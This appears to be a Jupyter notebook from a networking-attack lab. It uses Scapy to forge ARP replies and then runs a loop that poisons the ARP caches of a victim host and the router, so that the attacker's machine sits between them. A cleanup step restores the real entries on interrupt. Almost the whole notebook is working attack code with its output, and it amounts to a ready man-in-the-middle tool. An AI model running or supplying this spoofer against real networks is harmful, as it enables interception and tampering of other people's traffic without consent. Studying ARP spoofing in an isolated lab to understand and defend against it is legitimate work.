# Crafting a fake ARP response packet

In [1]:
import scapy.all as scapy

In [2]:
scapy.ls(scapy.ARP())

hwtype     : XShortField                         = 1               (1)
ptype      : XShortEnumField                     = 2048            (2048)
hwlen      : ByteField                           = 6               (6)
plen       : ByteField                           = 4               (4)
op         : ShortEnumField                      = 1               (1)
hwsrc      : ARPSourceMACField                   = '08:00:27:74:17:d4' (None)
psrc       : SourceIPField                       = '10.0.2.15'     (None)
hwdst      : MACField                            = '00:00:00:00:00:00' ('00:00:00:00:00:00')
pdst       : IPField                             = '0.0.0.0'       ('0.0.0.0')


In [3]:
router_ip = '10.0.2.1'
router_mac = '52:54:00:12:35:00'

victim_ip = '10.0.2.4'
victim_mac = '08:00:27:10:b8:d0'

my_ip = '10.0.2.15'
my_mac = '08:00:27:74:17:d4'

In [4]:
packet = scapy.ARP(op=2, pdst=victim_ip, hwdst=victim_mac, psrc=router_ip, hwsrc=my_mac)
packet.show()

###[ ARP ]### 
  hwtype    = 0x1
  ptype     = 0x800
  hwlen     = 6
  plen      = 4
  op        = is-at
  hwsrc     = 08:00:27:74:17:d4
  psrc      = 10.0.2.1
  hwdst     = 08:00:27:10:b8:d0
  pdst      = 10.0.2.4



In [5]:
packet.summary()

'ARP is at 08:00:27:74:17:d4 says 10.0.2.1'

In [6]:
scapy.send(packet)


Sent 1 packets.


# Crafting our ARP spoofing method

In [7]:
def get_mac(ip):
    arp = scapy.ARP(pdst=ip)
    ether = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
    ans = scapy.srp(ether/arp, timeout=1, retry=10, verbose=False)[0]
    if len(ans) > 0:
        return ans[0][1].hwsrc

In [8]:
victim_mac = get_mac(victim_ip)
print(victim_ip + ' => ' + victim_mac)

10.0.2.4 => 08:00:27:10:b8:d0


In [9]:
def arp_spoof(victim_ip, victim_mac, set_his_ip, to_this_mac):
    packet = scapy.ARP(op=2, pdst=victim_ip, hwdst=victim_mac, psrc=set_his_ip, hwsrc=to_this_mac)
    scapy.send(packet, verbose=False)

In [10]:
import time

In [11]:
try:
    # Poison
    while True:
        arp_spoof(victim_ip, victim_mac, router_ip, my_mac)
        arp_spoof(router_ip, router_mac, victim_ip, my_mac)
        time.sleep(1)
        print('\r[+] Sending packets . ', end='')
        time.sleep(1)
        print('\r[+] Sending packets ..', end='')
except KeyboardInterrupt:
    # Cure
    arp_spoof(victim_ip, victim_mac, router_ip, router_mac)
    arp_spoof(router_ip, router_mac, victim_ip, victim_mac)
    print('\n[-] Quit')

[+] Sending packets ..
[-] Quit
